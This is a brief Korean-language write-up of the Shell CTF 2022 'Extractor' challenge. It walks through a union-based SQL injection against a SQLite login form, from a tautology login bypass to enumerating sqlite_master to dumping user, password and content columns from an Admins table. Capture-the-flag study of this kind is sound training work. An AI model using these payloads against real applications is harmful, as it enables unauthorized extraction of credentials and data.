[shell ctf 2022] Extractor

1. 개요

union sql injection 문제

sqlite

 

2. 분석

1) sql injection 

회원가입 창에 sql 구문을 삽입하면, 로그인할때 넣지 않는 정보가 조회됩니다.

' or 'a' = 'a

로그인할때 원하는 정보를 때낼 수 있을것 같습니다.

 

2) union sql injection 

다음 구문으로 걸리는 것으로 볼때 sqlite 입니다.

' union select 1, 2, 3, sql from sqlite_master --

Admins 테이블에 총 4개의 칼럼이 있습니다. id, user, pass, content 모두 가져와봅시다.

다음 코드를 넣으면 signature 칼럼에 저장된 flag를 확인할 수 있습니다.

' union select id, user, pass, content from Admins --